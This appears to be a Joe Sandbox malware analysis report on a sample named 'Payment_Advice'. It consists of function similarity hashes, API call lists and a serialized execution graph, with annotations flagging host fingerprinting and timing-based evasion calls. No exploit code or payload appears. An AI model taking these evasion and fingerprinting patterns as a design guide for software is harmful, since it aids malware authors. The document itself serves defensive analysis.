• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: File$Attributes$CloseFindH_prologTime_wcslen
• String ID: :
• API String ID: 3226429890-336475711
• Opcode ID: 21be456bff54555c9b23307bb12e946513264eeeac75c3ee5ad90de99de7fbdb
• Instruction ID: 9732d5bb1a971f9b6bb1efc806ab0bcff97b213af883554915b36ad9f5c7fba9
• Opcode Fuzzy Hash: 21be456bff54555c9b23307bb12e946513264eeeac75c3ee5ad90de99de7fbdb
• Instruction Fuzzy Hash: B5415071901659A9EB25EB64CC59EEEBB7CFF85300F004096B60AA30D2DB746F85CF60
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: _wcschr
• String ID: *
• API String ID: 2691759472-163128923
• Opcode ID: 88e0316d952a737de659b873b30e32db82b321067ca43ddceef709dfbde03f35
• Instruction ID: 6eb7af81e5d3a59892f6f2ff5938e13e75e76219514755763e021da653776918
• Opcode Fuzzy Hash: 88e0316d952a737de659b873b30e32db82b321067ca43ddceef709dfbde03f35
• Instruction Fuzzy Hash: FE312622104302AAFE309E1499C6A7F7FEAFF91B10F25881EF984471C3E7668F419261
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: _wcslen
• String ID: }
• API String ID: 176396367-4239843852
• Opcode ID: acd62f3611627c9ad9b8522e53c80218149a12300aeb418b2572effd935d308d
• Instruction ID: b3eea7c4f8045d34bced82bcb867d65d3e351d86522f12d8a5ab093b614dc9b9
• Opcode Fuzzy Hash: acd62f3611627c9ad9b8522e53c80218149a12300aeb418b2572effd935d308d
• Instruction Fuzzy Hash: DA21F6729043165AFB31EB64E849EABBBEDFF91754F05042AF540C3141F765DD8883A2
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0050F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0050F2E4
  • Part of subcall function 0050F2C5: GetProcAddress.KERNEL32(005481C8,CryptUnprotectMemory), ref: 0050F2F4
• GetCurrentProcessId.KERNEL32(?,?,?,0050F33E), ref: 0050F3D2
Strings
• CryptProtectMemory failed, xrefs: 0050F389
• CryptUnprotectMemory failed, xrefs: 0050F3CA
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
• Opcode ID: 3d0e623631f3c06ffb75807a9a365b42eb84a12a13ba90048ec88f1e1a0a34ba
• Instruction ID: daa9651beeb5e1b330ed277c4adce03b6207df1b88570a66ea3855916bfa645e
• Opcode Fuzzy Hash: 3d0e623631f3c06ffb75807a9a365b42eb84a12a13ba90048ec88f1e1a0a34ba
• Instruction Fuzzy Hash: 6B11263160062AABEF35AF20EC46AEE3F54FF50734B044526FC015B6D1DA30AD459790
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: _wcschr
• String ID: <9S$?*<>|"
• API String ID: 2691759472-1328803747
• Opcode ID: 590c7d167f94264fd64919f9407a584865630e384074c1a41a0d612516e33b63
• Instruction ID: a1d84fe9fab17e5f76e5665d5d0fb7190184b48156dd3761dce1c8f62a4ed7fb
• Opcode Fuzzy Hash: 590c7d167f94264fd64919f9407a584865630e384074c1a41a0d612516e33b63
• Instruction Fuzzy Hash: 49F06D57A45702D5C7301F29A82573EBFE4FF97720F240A1EE5C58B2D2E6A18880C665
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: _wcslen
• String ID: Software\WinRAR SFX$Q
• API String ID: 176396367-2798703949
• Opcode ID: ee373c934b37fa8eec34d7eecdde8ed3e1c4dcd21b64c0243870c709cfd11914
• Instruction ID: 64f691925c22f617dd5d44e435a85570634e31ce1a2d62818cf9290a745d5976
• Opcode Fuzzy Hash: ee373c934b37fa8eec34d7eecdde8ed3e1c4dcd21b64c0243870c709cfd11914
• Instruction Fuzzy Hash: 27015A35540128BAEF229B95DC0EFDF7F7CFB553A8F000052B54AA50A0D7A48A8CDAA1
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 005297E5: GetLastError.KERNEL32(?,00541098,00524674,00541098,?,?,005240EF,?,?,00541098), ref: 005297E9
  • Part of subcall function 005297E5: _free.LIBCMT ref: 0052981C
  • Part of subcall function 005297E5: SetLastError.KERNEL32(00000000,?,00541098), ref: 0052985D
  • Part of subcall function 005297E5: _abort.LIBCMT ref: 00529863
• _abort.LIBCMT ref: 0052BB80
• _free.LIBCMT ref: 0052BBB4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: ErrorLast_abort_free
• String ID: pS
• API String ID: 289325740-3706138410
• Opcode ID: 2f3fb8b422be33387bd60c781299339e25ccc193ea4d9222602d5c2637a934e3
• Instruction ID: 78b0582b709611657d5519924c23ee75a43a0ae7f9ef02b0a2730c3b41150fe8
• Opcode Fuzzy Hash: 2f3fb8b422be33387bd60c781299339e25ccc193ea4d9222602d5c2637a934e3
• Instruction Fuzzy Hash: BC01D232D01632DBDB21AF68A40222DBFB1BF46B21B15010AF824A73D5CB346D419FC1
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: Malloc
• String ID: (Q$ZQ
• API String ID: 2696272793-758804005
• Opcode ID: 4ec28dbae7e987cd159fd8c48784f2b055eb475d6fb4dc774040b5c54b2d2472
• Instruction ID: ac635da68c130f9e69872afc1549243199d00621a9fd85dcd908030d6a4f3979
• Opcode Fuzzy Hash: 4ec28dbae7e987cd159fd8c48784f2b055eb475d6fb4dc774040b5c54b2d2472
• Instruction Fuzzy Hash: 070124B6600108BFEF059FA4DC49CEEBBADEF182547004159F906D7120E671AA48EBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,00511101,?,?,0051117F,?,?,?,?,?,00511169), ref: 00510FEA
• GetLastError.KERNEL32(?,?,0051117F,?,?,?,?,?,00511169), ref: 00510FF6
  • Part of subcall function 00506C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00506C54
Strings
• WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00510FFF
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: ErrorLastObjectSingleWait__vswprintf_c_l
• String ID: WaitForMultipleObjects error %d, GetLastError %d
• API String ID: 1091760877-2248577382
• Opcode ID: e6960048b1456675615e28d65f77d9dfeb3f875a374f6f6e13bc875da92fb780
• Instruction ID: 2b34cc5a235c2414c60f60b3d8868993fc2dbc38f1e0d243ce89fdd732a29114
• Opcode Fuzzy Hash: e6960048b1456675615e28d65f77d9dfeb3f875a374f6f6e13bc875da92fb780
• Instruction Fuzzy Hash: 27D02E329089313BE7203324AC0ECAE3D04FB62332F200B04F139622E2CA244DD56A96
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,?,0050DA55,?), ref: 0050E2A3
• FindResourceW.KERNEL32(00000000,RTL,00000005,?,0050DA55,?), ref: 0050E2B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: FindHandleModuleResource
• String ID: RTL
• API String ID: 3537982541-834975271
• Opcode ID: 16b8ea94ca86e60bf92892813cca4a592905857a2518451cd124933814bf5765
• Instruction ID: ab8953d44794e6dd8d95200373294565fad5e4a50807ad7ca52fafe2a48355dd
• Opcode Fuzzy Hash: 16b8ea94ca86e60bf92892813cca4a592905857a2518451cd124933814bf5765
• Instruction Fuzzy Hash: C3C0123164071066EB352764AD4EB876E586B20B12F090848B281EE2D1DAA5C98896A0
Uniqueness
Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E467
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: UQ$zQ
                                                                                                    • API String ID: 1269201914-3645726421
                                                                                                    • Opcode ID: b161809464269b26a5ca6722982a8e60a1d691b290f1076aaa8d20720c3249b3
                                                                                                    • Instruction ID: d1299ead132e042cc18a8c6d4edad7f944445ed8455be94ca9f509cdd9bc23c5
                                                                                                    • Opcode Fuzzy Hash: b161809464269b26a5ca6722982a8e60a1d691b290f1076aaa8d20720c3249b3
                                                                                                    • Instruction Fuzzy Hash: 1BB012D1258001BC320415141D0BC771F0CF9C0F20730C52EFE01D0082DAC10EC70432
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E467
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: pQ$zQ
                                                                                                    • API String ID: 1269201914-780565824
                                                                                                    • Opcode ID: b7db74328c2463961b5086b2db19b408399f4627a5070c4cf52bb44ef02502f7
                                                                                                    • Instruction ID: 92246cea67fc45063369d4111d4bc7324a36b0301fd6cb626343c353c93ed5a0
                                                                                                    • Opcode Fuzzy Hash: b7db74328c2463961b5086b2db19b408399f4627a5070c4cf52bb44ef02502f7
                                                                                                    • Instruction Fuzzy Hash: 08B012C1659042BC3204D1181C0BC770E4CF8C0B60730842EFC05C1081DAC04CC70532
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:3.8%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:1.6%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:81
Execution graph node list (the interactive graph is serialised as `node-id address [API names | "N API calls"]` entries plus `id->id` edges; the captured portion, condensed to its API-bearing nodes):

• Path and configuration lookup: 1de753 SHGetFolderPathW; 17560c RegOpenKeyExW, 175626 RegQueryValueExW, 17565c RegCloseKey; 175337 RegOpenKeyExW, 1b4bc0 RegQueryValueExW, 1b4c56 RegCloseKey; 1741b8 RegQueryValueExW; 175528 GetModuleFileNameW; 1751cc / 17558b GetFullPathNameW
• Host fingerprinting: 175d8f GetVersionExW; 175ecc GetCurrentProcess, IsWow64Process; 175f00 LoadLibraryA, 175f11 GetProcAddress, 175f21 GetNativeSystemInfo, 175f2b FreeLibrary; 175f4d / 1b50f2 GetSystemInfo
• Timing and evasion-relevant calls: 1df1a7 QueryPerformanceCounter, QueryPerformanceFrequency, Sleep, QueryPerformanceCounter, Sleep; 17f0b4 / 1c338d / 18f27e timeGetTime; 17f25f / 1c4127 / 1c425c Sleep; 20331e GetForegroundWindow; 17eeb7 GetInputState
• Child-process handling: 1c41be GetExitCodeProcess, 1c41d4 WaitForSingleObject, 1c41ea CloseHandle
• Window and message-loop runtime: 17f1c1 / 17f23f PeekMessageW; 17f223 TranslateMessage, DispatchMessageW; 1c3271 TranslateAcceleratorW; 18f2e5 IsDialogMessageW; 1cf83b GetClassLongW; 1736f6 DefWindowProcW; 173743 SetTimer, RegisterWindowMessageW; 173727 KillTimer; 18fd42 KillTimer, SetTimer; 17376c CreatePopupMenu; 17388e / 1cfdcb / 17603e Shell_NotifyIconW; 1b3daa MoveWindow; 1b3d99 SetFocus; 17572c DeleteObject, DestroyWindow; 17378b PostQuitMessage; 1b5101 LoadStringW
• CRT and file I/O runtime: 1b073a CreateFileW; 1b0b21 GetFileType; 1b0b3a / 1b0c9c CloseHandle; 1a8a92 FindCloseChangeNotification; 1a5045 RtlAllocateHeap; 1a2d63 RtlFreeHeap; GetLastError at 1a2d7e, 1a8a9e, 1b0af6, 1b0b2c, 1b0cd1; EnterCriticalSection / LeaveCriticalSection / DeleteCriticalSection wrappers at 1a32ee, 1a3336, 1a50c0, 1994ed, 19951d, 19e0f6, 19ea7e, 1a54d7, 1a898b, 1a5657, 1a5664; 190588 EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent; 193634 RaiseException
• Remaining nodes are CRT helpers (__fread_nolock, _wcslen, __wsopen_s, __dosmaperr, pre_c_initialization, ___std_exception_copy, __onexit, ___scrt_fastfail, __Init_thread_wait) and opaque "N API calls" summary nodes, the largest being 1802f0, 182ad0, 18b2d6 and 1f721e (230 API calls each) and 1f5131 (101 API calls)
100350->100347 100351 17ea7e 100350->100351 100353 19016b 8 API calls 100351->100353 100352 17ecaf 100354 17ecc4 100352->100354 100355 1c3167 100352->100355 100365 17ea85 __fread_nolock 100353->100365 100357 19016b 8 API calls 100354->100357 100382 1f6062 8 API calls 100355->100382 100361 19019b 8 API calls 100356->100361 100369 17eb1a 100357->100369 100359->100346 100360->100365 100361->100371 100383 1e3ef6 81 API calls __wsopen_s 100362->100383 100363 19016b 8 API calls 100364 17eaa6 100363->100364 100364->100371 100377 17d210 230 API calls 100364->100377 100365->100363 100365->100364 100367 1c3156 100381 1e3ef6 81 API calls __wsopen_s 100367->100381 100369->100307 100371->100352 100371->100367 100371->100369 100372 1c3131 100371->100372 100374 1c310f 100371->100374 100378 174485 230 API calls 100371->100378 100380 1e3ef6 81 API calls __wsopen_s 100372->100380 100379 1e3ef6 81 API calls __wsopen_s 100374->100379 100376->100308 100377->100371 100378->100371 100379->100369 100380->100369 100381->100369 100382->100362 100383->100348 100384->100326 100385->100314 100386->100321 100387->100326 100388->100326 100389->100326 100390->100326 100391->100326 100392->100326 97712 19078b 97713 190797 ___scrt_is_nonwritable_in_current_image 97712->97713 97742 190241 97713->97742 97715 19079e 97716 1908f1 97715->97716 97719 1907c8 97715->97719 97783 190bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97716->97783 97718 1908f8 97776 1951e2 97718->97776 97728 190807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97719->97728 97753 1a280d 97719->97753 97726 1907e7 97732 190868 97728->97732 97779 1951aa 38 API calls 2 library calls 97728->97779 97730 19086e 97765 1732a2 97730->97765 97761 190ce9 97732->97761 97736 19088a 97736->97718 97737 19088e 97736->97737 97738 190897 97737->97738 97781 195185 28 API calls _abort 97737->97781 97782 1903d0 13 API calls 2 library calls 97738->97782 97741 
19089f 97741->97726 97743 19024a 97742->97743 97785 190a28 IsProcessorFeaturePresent 97743->97785 97745 190256 97786 193024 10 API calls 3 library calls 97745->97786 97747 19025b 97752 19025f 97747->97752 97787 1a26a7 97747->97787 97750 190276 97750->97715 97752->97715 97755 1a2824 97753->97755 97754 190e1c _ValidateLocalCookies 5 API calls 97756 1907e1 97754->97756 97755->97754 97756->97726 97757 1a27b1 97756->97757 97758 1a27e0 97757->97758 97759 190e1c _ValidateLocalCookies 5 API calls 97758->97759 97760 1a2809 97759->97760 97760->97728 97838 1926d0 97761->97838 97764 190d0f 97764->97730 97766 1732ae IsThemeActive 97765->97766 97767 173309 97765->97767 97840 1952d3 97766->97840 97780 190d22 GetModuleHandleW 97767->97780 97769 1732d9 97846 195339 97769->97846 97771 1732e0 97853 17326d SystemParametersInfoW SystemParametersInfoW 97771->97853 97773 1732e7 97854 173312 97773->97854 98894 194f5f 97776->98894 97779->97732 97780->97736 97781->97738 97782->97741 97783->97718 97785->97745 97786->97747 97791 1ad596 97787->97791 97790 19304d 8 API calls 3 library calls 97790->97752 97794 1ad5b3 97791->97794 97795 1ad5af 97791->97795 97793 190268 97793->97750 97793->97790 97794->97795 97797 1a4f8b 97794->97797 97809 190e1c 97795->97809 97798 1a4f97 ___scrt_is_nonwritable_in_current_image 97797->97798 97816 1a32ee EnterCriticalSection 97798->97816 97800 1a4f9e 97817 1a543f 97800->97817 97802 1a4fad 97808 1a4fbc 97802->97808 97830 1a4e1f 29 API calls 97802->97830 97805 1a4fb7 97831 1a4ed5 GetStdHandle GetFileType 97805->97831 97806 1a4fcd __fread_nolock 97806->97794 97832 1a4fd8 LeaveCriticalSection _abort 97808->97832 97810 190e25 97809->97810 97811 190e27 IsProcessorFeaturePresent 97809->97811 97810->97793 97813 190fee 97811->97813 97837 190fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97813->97837 97815 1910d1 97815->97793 97816->97800 97818 1a544b ___scrt_is_nonwritable_in_current_image 97817->97818 97819 1a5458 97818->97819 
97820 1a546f 97818->97820 97834 19f669 20 API calls __dosmaperr 97819->97834 97833 1a32ee EnterCriticalSection 97820->97833 97823 1a545d 97835 1a2b7c 26 API calls pre_c_initialization 97823->97835 97825 1a5467 __fread_nolock 97825->97802 97826 1a54a7 97836 1a54ce LeaveCriticalSection _abort 97826->97836 97828 1a547b 97828->97826 97829 1a5390 __wsopen_s 21 API calls 97828->97829 97829->97828 97830->97805 97831->97808 97832->97806 97833->97828 97834->97823 97835->97825 97836->97825 97837->97815 97839 190cfc GetStartupInfoW 97838->97839 97839->97764 97841 1952df ___scrt_is_nonwritable_in_current_image 97840->97841 97903 1a32ee EnterCriticalSection 97841->97903 97843 1952ea pre_c_initialization 97904 19532a 97843->97904 97845 19531f __fread_nolock 97845->97769 97847 19535f 97846->97847 97848 195345 97846->97848 97847->97771 97848->97847 97908 19f669 20 API calls __dosmaperr 97848->97908 97850 19534f 97909 1a2b7c 26 API calls pre_c_initialization 97850->97909 97852 19535a 97852->97771 97853->97773 97855 173322 __wsopen_s 97854->97855 97856 17bf07 8 API calls 97855->97856 97857 17332e GetCurrentDirectoryW 97856->97857 97910 174f60 97857->97910 97903->97843 97907 1a3336 LeaveCriticalSection 97904->97907 97906 195331 97906->97845 97907->97906 97908->97850 97909->97852 97911 17bf07 8 API calls 97910->97911 97912 174f76 97911->97912 98034 1760f5 97912->98034 97914 174f94 97915 17bceb 8 API calls 97914->97915 97916 174fa8 97915->97916 98048 17be6d 97916->98048 97918 174fb3 98052 1788e8 97918->98052 97921 17b25f 8 API calls 97922 174fcc 97921->97922 98055 17bdc1 97922->98055 97924 174fdc 97925 17b25f 8 API calls 97924->97925 97926 175002 97925->97926 97927 17bdc1 39 API calls 97926->97927 97928 175011 97927->97928 97929 17bf07 8 API calls 97928->97929 97930 17502f 97929->97930 98059 175151 97930->98059 97934 175049 97935 175053 97934->97935 97936 1b4afd 97934->97936 97937 194db8 _strftime 40 API calls 97935->97937 97938 175151 8 API calls 97936->97938 97940 17505e 97937->97940 
97939 1b4b11 97938->97939 97942 175151 8 API calls 97939->97942 97940->97939 97941 175068 97940->97941 97943 194db8 _strftime 40 API calls 97941->97943 97944 1b4b2d 97942->97944 97945 175073 97943->97945 97947 17551b 10 API calls 97944->97947 97945->97944 97946 17507d 97945->97946 97948 194db8 _strftime 40 API calls 97946->97948 97949 1b4b50 97947->97949 97950 175088 97948->97950 97951 175151 8 API calls 97949->97951 97952 175092 97950->97952 97953 1b4b79 97950->97953 97956 1b4b5c 97951->97956 97954 1750b5 97952->97954 97957 17be6d 8 API calls 97952->97957 97955 175151 8 API calls 97953->97955 97959 1b4bb4 97954->97959 98075 177d51 97954->98075 97958 1b4b97 97955->97958 97960 17be6d 8 API calls 97956->97960 97961 1750a8 97957->97961 97962 17be6d 8 API calls 97958->97962 97964 1b4b6a 97960->97964 97965 175151 8 API calls 97961->97965 97966 1b4ba5 97962->97966 97968 175151 8 API calls 97964->97968 97965->97954 97969 175151 8 API calls 97966->97969 97968->97953 97969->97959 97973 1788e8 8 API calls 97975 1750ee 97973->97975 97974 178a10 8 API calls 97974->97975 97975->97973 97975->97974 97976 175132 97975->97976 97977 175151 8 API calls 97975->97977 97977->97975 98035 176102 __wsopen_s 98034->98035 98036 1784b7 8 API calls 98035->98036 98037 176134 98035->98037 98036->98037 98041 17616a 98037->98041 98097 17627c 98037->98097 98039 176238 98040 17626d 98039->98040 98042 17b25f 8 API calls 98039->98042 98040->97914 98041->98039 98044 17b25f 8 API calls 98041->98044 98046 17684e 8 API calls 98041->98046 98047 17627c 8 API calls 98041->98047 98043 176261 98042->98043 98045 17684e 8 API calls 98043->98045 98044->98041 98045->98040 98046->98041 98047->98041 98049 17be90 __fread_nolock 98048->98049 98050 17be81 98048->98050 98049->97918 98050->98049 98051 19019b 8 API calls 98050->98051 98051->98049 98053 19016b 8 API calls 98052->98053 98054 